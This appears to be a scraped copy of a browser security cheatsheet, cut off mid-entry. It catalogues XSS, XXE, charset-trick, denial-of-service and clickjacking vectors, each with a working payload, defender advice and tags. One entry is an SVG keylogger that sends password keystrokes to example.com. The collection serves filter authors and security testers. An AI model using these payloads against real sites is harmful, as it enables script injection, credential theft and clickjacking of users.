<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test4.svgname: test4.svg
- xss
- javascript
- svg
- css
- xml
- style
LeverOne
SVG chameleon behavior via embedded XSLT#125 test
This SVG chameleon file can be embedded via <embed> on most, and via <img> on most modern browsers. Thanks to the embedded XSLT stylesheet, it will change it's appearance, depending on how it is embedded or displayed. In an <img> tag it just shows a red dot. But opened directly or via an <iframe> or <embed>, the XSLT turns all SVG into (X)HTML and an alert will show. While most modern browsers show this behavior, Opera will completely mess it up, and show an alert when used via <embed> and an <iframe> when used via <img> (!). Chrome will show a broken image and an alert.
<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
- svg
- html
- chameleon
- xslt
- embedded
- xss
.mario
JavaScript execution on Opera via listener delegation#127 test
The example vector - relating to #94 - shows how a combination of listener and hander tags can be used to delegate a load event from the SVG element to trigger actual JavaScript execution. So far only Opera supports the usage of XML events and related elements in this context. No user interaction is required to execute the JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
- svg
- opera
- xml
- events
- listener
- handler
- xss
.mario
Firefox parsing entity encoded HTML in SVG#128 test
Firefox 4 allows HTML entities used in plain-text tags such as style, nostyle, noframes and others to represent their canonical form. This leads to possibilities bypassing filters despite of proper HTML encoding as the example demonstrates - especially when inline SVG and innerHTML copy access are being used. This bug has been fixed in most recent Firefox versions.
<svg><style><img/src=x onerror=alert(1)// </b>
- svg
- xss
- inline
- entities
- firefox
- css
- xml
- innerhtml
.mario
Opera active JavaScript execution via STYLE in SVG#129 test
Additional to script execution via "xlink:href" in SVG elements such as <image>, <animation>, <foreignObject>, Opera 11 allows to utilize filters (as well as other CSS properties listed in #109) to accomplish the same. Note that either these CSS properties, as well as the analogous attributes (the filter attribute in particular) can be used in this case. Both style and analogous attributes in inline SVG should be considered unsafe.
<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>  </svg>
Do not allow style and filter attributes inside user generated SVG data. It's considerably the best to generally avoid user generated SVG data - if possible.
- svg
- xss
- inline
- opera
- css
- style
- #88
- #109
LeverOne
SVG <set> and <animate> elements allow key-logging w/o JavaScript#132 test
It is possible to achieve an injection capable to exfiltrate keyboard events without any JavaScript execution via SVG and set/animate timing attributes. In essence, an access key can be specified to trigger events inside an SVG. In case an inline SVG is being used, the listener for these keys observes the whole document - and not just the SVG itself. This means that even keystrokes into a form input trigger the SVG access key handler. Once this access key handler is being combined with adding a new keystroke-depending image source to an existing image, the form input will be filled, and the SVG will reset a hidden image source according to the key being pressed and thereby silently exfiltrate the data. Since all this works without using any JavaScript, it was also possible to execute this attack in latest Thunderbird versions - with the vector invisibly wrapped inside the mail-body. The problem has been reported and fixed, CVE-2011-3663 has been assigned. Current stable versions of Firefox still allow to observe the problem - using a network traffic monitor/Firebug is recommended.
<!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>
- svg
- html5
- noscript
- keylogger
- firefox
- thunderbird
.mario
Executing JavaScript via "from" attribute in SVG and inline-SVG#137 test
It is commonly known, that the <animate> element in combination with the "to" parameter can be used to change existing attributes to potentially active values and cause arbitrary script execution. It is nevertheless also possible to use the "from" attribute for the very same purpose - albeit this being rather counter-intuitive. The given example code snippet describes an SVG containing a circle that encapsulates an <animate> element. This uses the "from" attribute to set the "href" attribute of the link encapsulating the circle to a JavaScript URI. Clicking the circle will execute the JavaScript.
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
Avoid inline-SVG in combination with user-generated content. In case SVG needs to be used, avoid potentially harmful content for "to", "from", "values" and "by" attributes.
- html5
- svg
- from
- inline
- xss
- passive
- http://jsbin.com/uxadon/3
- http://www.w3.org/TR/SVG/animate.html#FromAttribute
.mario
Executing JavaScript using ES6 Template Strings in SVG#141 test
The new language features shown in #140 can also be used in the context of an SVG image. Here, the named entity of the back-tick, the &DiacriticalGrave; can be used to initiate execution of a function or method.
<svg><script> alert&DiacriticalGrave;1&DiacriticalGrave; <p> <svg><script> alert&grave;1&grave; <p>
Make sure that your IDS, filter and other protective systems are aware of the fact, that in SVG, HTML-encoded back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript.
- es6
- javascript
- backtick
- template
- svg
.mario

Vectors related to X(HT)ML
Opera XML-stylesheets executing JavaScript#17 test
Opera 9.x and 10.0 allow to apply XML-stylesheets with JavaScript URIs and. The vectors even works if the page is delivered as text/html.
<?xml-stylesheet href="javascript:alert(1)"?><root/>
Make sure that user input cannot contain XML stylesheets or tags not consisting of <\w+ - because this vector would only be matched via <\?\w+ but still executes JavaScript without user interaction. Avoid blacklists is possible.
- xss
- javascript
- opera
- xml
- css
- proprietary
.mario
Entities inside <SCRIPT> and comparable tags#18 test
By specification user agents allow using HTML entities between <SCRIPT> and <STYLE> tags in case the document is being delivered and rendered as X(HT)ML.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
Make sure filters and detection systems consider the fact of having entities to be allowed inbetween <SCRIPT>, <STYLE> and other tags - and not only in attributes.
- xss
- javascript
- opera
- internet explorer
- firefox
- chrome
- safari
- xml
- entity
.mario
Arbitrary payload injection via XML External Entities (XXE)#64 test
Chrome and Safari allow using external XML entities to reference payload for an entity. The example shows that the entity &x; is now being filled with the content of the given file. The document must be delivered as XML or XHTML. Note that the absolute URL for the source of XXE is required.
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
In case an attacker can inject data into the DOCTYPE area of the targeted website it's easy to fool filtering mechanisms since the actual payload is hidden in a harmless looking entity. Make sure no injections in that area are possible.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>crossdomain: 0path: http://html5sec.org/test.xxename: test.xxe
- xss
- javascript
- xxe
- safari
- chrome
- xml
- entities
- doctype
.mario
Opera XML-stylesheets executing JavaScript (2)#66 test
Opera supports xml-stylesheet via data URIs. There are many ways to execute javascript using the XSL (XSLT). If you put this code in an external file on the same domain, then it will work in all browsers. It is also possible appeal to the code of the stylesheet by id (href = "#xss"), when the stylesheet implemented in the current document.
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
- xss
- javascript
- opera
- xslt
- xsl
- stylesheet
- xml
LeverOne
XML ATTLIST declaration causing JavaScript execution#67 test
XML ATTLIST declarations can be used to create attributes and assign values for matching tags inside the DOCTYPE declaration. By chosing the right namespace and attribute combinations it's possible to create an ATTLIST declaration causing JavaScript execution without user interaction.
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
In case a website is being delivered as XML or XHTML make sure an attacker has no possibility to inject data into the DOCTYPE or create new ATTLIST directives.
- xss
- javascript
- opera
- attlist
- doctype
- chrome
- firefox
- safari
.mario
Passive JavaScript execution via XLinks#68 test
Gecko based browsers like Firefox allow using XLinks. Those can be equipped with a JavaScript URI to execute JavaScript in case the user clicks on one of those XLinks.
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
- xss
- javascript
- xlink
- firefox
- xml
.mario
Opera WML JavaScript execution via timer event#69 test
Opera supports WML files - Wireless Markup Language. As soon as a file has the extension .wml Opera assumes it's a WML and renders it accordingly. With a timer event and a connected redirect it's possible to execute JavaScript without user interaction.
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
- xss
- javascript
- wmlscript
- wml
- opera
- mobile
- timer
.mario
Arbitrary payload injection via XML external DTD in IE#76 test
IE will render doctype-provided entities in the "html" namespace as soon as a user defined XML stylesheet tag is present. The example works up to IE8 standards mode.
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">crossdomain: 1path: http://html5sec.org/test.dtdname: test.dtd
- xss
- javascript
- internet explorer
- xml
- dtd
- arbitrary
- #64
- #67
LeverOne
XML JavaScript execution via style attribute in IE#77 test
IE supports the style attribute in xml-pages too. Thus JavaScript can be executed via expression() with any given tag. The example works up to IE 7 standards mode.
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
- xss
- javascript
- internet explorer
- xml
- css
- style
LeverOne
Arbitrary payload injection via XSL + XDR-schema in IE#78 test
The namespace "html" is automatically determined using XSL. Missing attributes for the <img> tag such as "onerror" are obtained from the XDR-schema - and will then execute JavaScript. The example works up to IE 8 standards mode.
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="alert(1)"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>crossdomain: 1path: http://html5sec.org/test.xdrname: test.xdr
- xss
- javascript
- internet explorer
- xml
- xdr
- arbitrary
- xml data reduced
- xsl
- http://msdn.microsoft.com/en-us/library/ms256208(v=VS.100).aspx
LeverOne
Active JavaScript execution via XLink#81 test
FF supports the "xlink:actuate" attribute and allows displaying XML link without additional styles. The default namespace here is "html".
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
- xss
- javascript
- xlink
- firefox
- xml
LeverOne, .mario
JavaScript execution via XML stylesheet, data URI and expression()#82 test
Internet Explorer 8 to 10 support data URIs and thus are capable of including stylesheets this way. By using a xml stylesheet tag and a data URI containing an expression() it's possible to execute JavaScript without user interaction.
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
- xss
- javascript
- xml stylesheet
- css
- internet explorer
- expression
- xml
- http://www.w3.org/TR/xml-stylesheet/
.mario
Obfuscated WML injection via undeclared WAP-ML Variables#83 test
The example demonstrates the use in WML undeclared variables (are ignored). These variables can be declared in the tags <setvar>, <input>, <select>. Namespace indicated for use inside the XML-file. Also inside WML-files can you use a lot of regular HTML-tags.
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
- xss
- javascript
- wml
- opera
- mobile
- timer
- variable
- http://www.w3schools.com/wap/wml_variables.asp
- #69
LeverOne, .mario
Opera JavaScript execution via XML-events handler#84 test
The browser tries to load an external XML-event handler and execute JavaScript without user interaction. The problem seems to be fixed in Opera 11.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
- xss
- javascript
- opera
- event
- handler
- http://www.w3.org/TR/xml-events/
- #85
LeverOne
Arbitrary payload injection in Opera via XML-events handler#85 test
The browser loads an external xml-event handler, which contains the JavaScript code. This example also works with data URIs.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>crossdomain: 1path: http://html5sec.org/test.evtname: test.evt
- xss
- javascript
- opera
- event
- handler
- arbitrary
LeverOne
Executing JavaScript with WD-XSL, <eval> elements and "expr" attributes#135 test
Internet Explorer, when loading an XML document in an older document mode, allows the use of a legacy XSL version called WD-XSL. This version, shipped with several proprietary extras, allows execution of JavaScript and other script code in very uncommon ways. The browser for instance supports an <eval> element and "expr" attributes that can directly be fed with script code or references to existing JavaScript and XMLDOM methods. Other than MSXSL script, direct DOM access is possible with the use of WD-XSL.
<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
Websites rendered in XML- or XML-like MIME types should not allow untrusted input without heavy filtering. Unknown elements can cause unexpected script execution depending on browser and render mode. The use of custom namespaces in user generated input should be prohibited.
- xss
- xslt
- internet explorer
- xml
- wdxsl
- legacy
- http://web.archive.org/web/20000816185012/http://msdn.microsoft.com/xml/reference/xsl/XSLElements.asp
- http://web.archive.org/web/20000816000901/http://msdn.microsoft.com/xml/reference/xsl/xslmethods.asp
.mario

UTF7 and other exotic charset based vectors
XSS via x-imap4-modified-utf7 (1)#2 test
This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
Make sure no <META> tags can be injected and the website is delivered with a charset.
- xss
- utf7
- firefox
- charset
.mario
XSS via x-imap4-modified-utf7 (2)#3 test
This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
Make sure no <META> tags can be injected and the website is delivered with a charset.
- xss
- utf7
- firefox
- charset
.mario
XSS via &#188 and &#190 in MacFarsi, MacArabic and MacHebrew#19 test
Buggy charset implementations in Firefox allow to craft HTML structures without using the usual characters such as < and >. Most affected charsets are from the Mac charset family - such as mac-farsi, mac-arabic and mac-hebrew.
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
User input should never allow <META> tags to avoid re-setting the charset. In case the website is encoded in one of the affected charsets make sure to have your filter be aware that for Firefox < (<) and ¼ are equivalent - as well as other characters too.
- x-mac-arabic
- x-mac-farsi
- x-mac-hebrew
- firefox
- charset
- https://twitter.com/#!/hasegawayosuke/status/25984750035
hasegawayosuke

Client side denial of service vectors
Client-side denial of service via repeat templates#13 test
This vector uses the repeat template syntax specifies in the WebForms 2.0 draft. By using nested tags repeating themselves all over again the client can be forced to deny service or even crash.
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
Avoid allowing users submitting HTML containing repeat or "repeat-start"/"repeat-end" attributes. If necessary validate the numerical values used for them to be reasonably small.
- dos
- repeat
- template
- webforms
- opera
- proprietary
- http://www.whatwg.org/specs/web-forms/current-work/#repeatingFormControls
.mario
Client-side denial of service via faulty regular expressions#14 test
Opera 10 allows client side validation via the pattern attribute. In case the pattern value is a badly written regex the client can be "dossed" with short customized character sequences.
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
Don't allow users to submit HTML containing "pattern" attributes and make sure your own client side regular expressions used for validation are well written and not vulnerable against easy ReDoS attacks.
- dos
- pattern
- regex
- html5
- validation
- opera
- proprietary
- http://www.whatwg.org/specs/web-apps/current-work/#the-pattern-attribute
- http://en.wikipedia.org/wiki/Regular_expression_Denial_of_Service_-_ReDoS
.mario
Input stealing/form DoS with onblur=focus() and autofocus#22 test
This very basic vector demonstrates how the combination of "autofocus" and "onblur" can render any other form on the targeted website useless.
<input onblur=focus() autofocus><input>
User submitted markup should not contain "autofocus" attributes.
- dos
- javascript
- opera
- chrome
- safari
- autofocus
- onblur
- html5
- http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602
Skyphire, Gareth, .mario

HTML behavior and binding vectors
Using onbegin and HTML+TIME to execute JavaScript#16 test
The HTML+TIME behavior allows to use arbitrary tags to execute JavaScript via onbegin event handlers.
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.
- xss
- javascript
- ie
- behavior
- html+time
- onbegin
- http://msdn.microsoft.com/en-us/library/ms533102%28VS.85%29.aspx
.mario
JavaScript execution via HTML+TIME without user interaction (1)#24 test
This obfuscated vector uses HTML+TIME to execute JavaScript without user interaction - and without suspicious event handlers but just "attributename" and "to" attributes.
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.
- xss
- javascript
- ie
- behavior
- html+time
- attributename
- to
- proprietary
- http://msdn.microsoft.com/en-us/library/ms533102%28VS.85%29.aspx
.mario
JavaScript execution via HTML+TIME without user interaction (2)#28 test
This HTML+TIME vector utilized the attributes "attributename" and "values" to map encoded markup into an attribute to execute JavaScript.
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
As soon as the HTML+TIME namespace and the behavior property are mapped to a HTML element a whole range of new attributes to execute JavaScript is available. In user submitted html "xmlns" attributes should not be allowed - as well as "behavior" properties for style tags and attribtes. Don't rely on blacklisting when dealing with user submitted markup.
- xss
- javascript
- internet explorer
- behavior
- style
- html+time
- attributename
- values
- proprietary
- http://msdn.microsoft.com/en-us/library/ms533102%28VS.85%29.aspx
LeverOne
VML frame with embedded VML object plus onmouseover#34 test
A VML frame object works by giving the VML frame a "src" attribute and have it point to another VML object. A VML frame object in quirks mode can enclose a VML rect object or regular HTML which is responding to mouseover events.
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>crossdomain: 1name: test.vml
- xss
- javascript
- style
- behavior
- vml
- internet explorer
- proprietary
- http://msdn.microsoft.com/en-us/library/bb263900%28VS.85%29.aspx
http://www.malware.com
VML line object utilizing href attribute with JavaScript URI#35 test
The vector paints a very thick and wide line responding to clicks with JavaScript execution via JavaScript URI. Note that the actual URI is being masked in the status bar. During an overlay attack the victim will not know about the payload via status bar.
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- xss
- javascript
- style
- behavior
- vml
- internet explorer
- proprietary
- http://msdn.microsoft.com/en-us/library/bb229513%28VS.85%29.aspx
LeverOne
AnchorClick behavior enabling folder attribute as href replacement#36 test
Using the AnchorClick behavior allows to use the "folder" attribute as replacement for a "href" attribute on <A> elements. This example works up to IE 8 standards mode.
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- xss
- javascript
- style
- behavior
- anchorclick
- internet explorer
- proprietary
- http://msdn.microsoft.com/en-us/library/ms531414%28VS.85%29.aspx
.mario
Internet Explorer Scriptlets executing JavaScript#52 test
Internet Explorer supports Scriptlets as an alternative binding method for Data Islands. By using the shown examples JavaScript will execute without user interaction.
<x style="behavior:url(test.sct)">
Users should not be able to either submit CSS or HTML containing style attributes. If necessary make sure the "behavior" property is not whitelisted.
<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>crossdomain: 0name: test.sct
- xss
- javascript
- behavior
- scriptlet
- internet explorer
- style
- css
- sct
- http://msdn.microsoft.com/en-us/library/aa189871%28office.10%29.aspx
- http://msdn.microsoft.com/en-us/library/ms766512%28VS.85%29.aspx
.mario
Internet Explorer Data Islands executing JavaScript#53 test
Internet Explorer supports Data Islands as an XMLish binding method. By using the shown examples JavaScript will execute without user interaction.
<xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
Users should not be able to submit HTML containing <XML> tags. If necessary make sure the "dataformatas" and "datasrc" attributes are not whitelisted.
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>crossdomain: 0path: http://html5sec.org/test.htcname: test.htc
- xss
- javascript
- behavior
- internet explorer
- style
- css
- data island
- http://msdn.microsoft.com/en-us/library/ms766512%28VS.85%29.aspx
.mario
Server-sent events - Opera and <EVENT-SOURCE> tags (1)#73 test
Opera allows using <EVENT-SOURCE> elements. In case the "src" attribute points to a valid cross domain source it's possible to have the element listen for events and the containing data.
<event-source src="event.php" onload="alert(1)">
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
<?php header("Content-Type: application/x-dom-event-stream"); die("Event: load\ndata: \n\n"); ?>crossdomain: 1path: http://html5sec.org/event.phpname: event.php
- xss
- javascript
- event-source
- opera
- sse
- http://hixie.ch/specs/html/server-sent-events/server-sent-events
.mario
Server-sent events - Opera and <EVENT-SOURCE> tags (2)#74 test
Opera allows using <EVENT-SOURCE> tags to receive server-sent events. In this example a data URI is being used as an event source triggering a click on another HTML element. In an attack scenario an XSS requiring user interaction can be turned into an active script execution this way.
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
- xss
- javascript
- event-source
- opera
- sse
- http://hixie.ch/specs/html/server-sent-events/server-sent-events
.mario
Internet Explorer applying behavior via <import namespace>#116 test
Internet Explorer allows to apply namespaces and attach behaviors not only by using CSS but <import> or <?import> tags. The example shows how to work with HTML+TIME behaviors without using style attributes or tags and cause script execution via the to attribute. If there is no attribute "targetElement", will be overridden "innerHTML" property of the <body> tag. To limit the area that be changed, you can use the attribute "targetElement". This syntax is also supported in IE9 for non-obsolete behaviors.
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
- xss
- behavior
- import
- xml
- namespace
- time
- entities
LeverOne, GreyMagic

Clickjacking and UI Redressing vectors
Reverse clickjacking via <IFRAME>#117 test
Internet Explorer allows to place <IFRAME> tags inside <A> tags. By clicking on a not clickable element inside the IFRAME there will be executed the URL defined in the "href" attribute of the <A> tag.
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
- clickjacking
- internet explorer
- iframe
- http://iseclab.org/papers/asiaccs122-balduzzi.pdf
mniemietz
Text injection by drag-and-drop#118 test
The method "setData" allows, with the event handler "ondragstart" and the attribute "draggable" with the value "true", to drag the text "malicious code" and not "Drop me" into the IFRAME. This IFRAME can consist of a web page with an input field to drop in data. Note that cross-origin drag&drop has meanwhile been heavily restricted in power due to security risks.
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>
- clickjacking
- firefox
- drag-and-drop
- setData
- ondragstart
- draggable
- http://www.w3.org/TR/html5/dnd.html#dnd
mniemietz
Content extraction via view-source#119 test
To show the source code of a web page inside the web browser Mozilla Firefox or Google Chrome, "view-source:" can be used as a prefix for the URL. Firefox - and that is essential for this vector - allows iframes to show view-source: URLs. With the combination of a "textarea" tag, just two drags to perform this attack are needed, as in the case of elements like images. The first drag is to select an element and the second to drag an element out of the iframe into the text area. This method also bypasses CSS and JS based clickjacking protection.
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>
- clickjacking
- firefox
- content extraction
- view-source
- https://www.contextis.com/documents/5/Context-Clickjacking_white_paper.pdf
mniemietz
Pop-up blocker bypass#120 test
A web browser like Firefox distinguishes between trusted and not trusted events, depending on the situation. User interactions like a click will be trusted for the reason that they are made explicitly by the user. If a web page initiates an event like opening a pop-up window automatically, the event is not trusted and therefore blocked. Tests have shown that other browsers like Google Chrome or Opera behave similarly. With the use of clickjacking techniques, an attacker can get its victim to create a trusted event by clicking on a link that opens one or more pop-up windows. Thus, an attacker can get the victim to unknowingly trigger a trusted event by doing a click. This event can be recycled by an attacker for later usage or directly used to e.g. generate pop-up windows that the user does not desire.
<script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>
- clickjacking
- internet explorer
- opera
- firefox
- chrome
- safari
- pop-up
- http://help.dottoro.com/ljoljvsn.php
- http://ui-redressing.mniemietz.de/uiRedressing.pdf
mniemietz
SVG masking#121 test
Masking elements can greatly simplify a clickjacking attack. Here, a "body" tag with the "style" attribute "background:gray" is given. As the name suggests, the background of the web page will have the color gray. The "iframe" tag holds the attributes "src" and "style". The URL of the target web page is the value of the "src" attribute. Inside the "style" attribute there is information to the width, the height, and the border of the web page. Finally, there is the property "mask" with "url(#maskForClickjacking)". This "url" points to an SVG with the "id" value "maskForClickjacking". On the next line, an "svg" tag with the namespace "svg" is deﬁned. After that, a "mask" tag with the attributes "id", "maskUnits" and "maskContentUnits" is inside the "svg" tag. The attribute "id" holds the value "maskForClickjacking", which is exactly the value inside the "url". The attribute "maskUnits" deﬁnes the coordinate system for the data of "x", "y", "width" and "height". The second attribute "maskContentUnits" deﬁnes the coordinate system for the contents of the "mask" with "objectBoundingBox". Inside the "mask" tag, there are two tags called "rect" and "circle". Each tag holds information to the position and is determined by the geometric shape the width and height or radius. The attribute "fill", with the value "white", ensures that the viewing whole in the mask is visible.
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>
- clickjacking
- firefox
- svg
- masking
mniemietz
Sandboxed Iframes#122 test
Google Chrome implements the HTML5 "sandboxed iframes". This particular example shows on how to turn this feature against websites only using JavaScript based frame-busters. Note that the framed website can still execute JavaScript - but has no privileges to modify the top frame's location. This would only be possible if the sandbox attribute also came with the "allow-top-navigation" parameter.
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
- clickjacking
- chrome
- iframe
- sandbox
- http://www.whatwg.org/specs/web-apps/current-work/multipage/the-iframe-element.html#attr-iframe-sandbox
- http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track-whole.html
kkotowicz
Classjacking with jQuery#123 test
CSS offers the attribute "class" as a selector to style a group of HTML elements. Consequently, it is feasible to style e.g. "span" and "a" tags. Here, the "span" tag has the value "foo" and the "a" tag the value "bar" inside the "class" attribute. This values can be used to define the font size or other CSS-specific properties. The first "script" tag holds an "src" attribute with the value "http://code.jquery.com/jquery-1.4.4.js". It is a reference to a file of the "jQuery JavaScript Library v1.4.4". The name "jQuery" stands for a JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions. So it is ideally suited to deal with user interactions and to manipulate them, as required for complex UI redressing attacks. Thus, "jQuery" is given in the second "script" tag. At first, the "span" tag is selected, which holds the value "foo" in the "class" attribute. After that, ".click" is implemented. It can be used to bind an event handler to the "click" JavaScript event, or to trigger that event on an element. In this case, an alert window will be executed with the text "foo" after clicking on the "Some text" value of the "span" tag. After closing the alert window, a click event is triggered on the "a" tag with the value "bar" inside the "class" attribute. Analogue to the first event, an alert window appears with the text "bar". After closing the alert window, the web browser will redirect the web page to "http://html5sec.org". If there is a click on the link "http://www.example.org" and not on the text "Some text", an alert window is displayed with the text "bar" followed by a redirection to "http://example.org" and not "http://html5sec.org". This 